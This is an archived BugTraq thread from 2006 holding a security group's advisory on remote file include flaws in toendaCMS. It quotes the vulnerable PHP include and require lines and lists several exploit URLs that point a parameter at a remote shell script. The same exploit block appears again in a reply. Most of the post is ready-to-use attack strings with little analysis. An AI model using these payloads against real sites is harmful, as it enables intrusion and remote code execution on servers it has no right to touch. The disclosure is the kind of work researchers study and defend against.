BugTraq
Back to list
|
Post reply
Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )
Aug 29 2006 12:09PM
h4ck3riran yahoo com
(1 replies)
************************************************************************
*******
*** ***
*** ***
*** ***
*** PerSiaNFoX DigitaL SecuritY TeaM ***
*** ***
*** ***
*** ***
************************************************************************
*******
<# ToendaCMS<= ( Remote File Include Vulnerabilities
<# Script.............. : toendaCMS
<# Discovered By.... : Root3r_H3ll
<# Location .......... : Iran
<# Class.............. : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds
------------------------------------------------------------------------
-------------------------------------
< # CodE : include($tcms_administer_site.'/tcms_global/database.php')
< #Expolit :
< #http://Www.Site.coM/[path]/index.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/browse.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/print.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/setup/inc/database.php?tcms_administer_site=
Sh3ll
< # CodE : require($tcms_administer_site.'/tcms_global/database.php')
< #Expolit :
< #http://Www.Site.coM/[path]/media.php?tcms_administer_site=Sh3ll
< #CodE: include($site.'.php');
< # Expolit :
< # http://Www.Site.coM/[path]/setup/index.php?site=Sh3ll
[ reply ]
Re: Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )
Aug 31 2006 11:40PM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
*******
*** ***
*** ***
*** ***
*** PerSiaNFoX DigitaL SecuritY TeaM ***
*** ***
*** ***
*** ***
************************************************************************
*******
<# ToendaCMS<= ( Remote File Include Vulnerabilities
<# Script.............. : toendaCMS
<# Discovered By.... : Root3r_H3ll
<# Location .......... : Iran
<# Class.............. : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds
------------------------------------------------------------------------
-------------------------------------
< # CodE : include($tcms_administer_site.'/tcms_global/database.php')
< #Expolit :
< #http://Www.Site.coM/[path]/index.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/browse.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/print.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/setup/inc/database.php?tcms_administer_site=
Sh3ll
< # CodE : require($tcms_administer_site.'/tcms_global/database.php')
< #Expolit :
< #http://Www.Site.coM/[path]/media.php?tcms_administer_site=Sh3ll
< #CodE: include($site.'.php');
< # Expolit :
< # http://Www.Site.coM/[path]/setup/index.php?site=Sh3ll
[ reply ]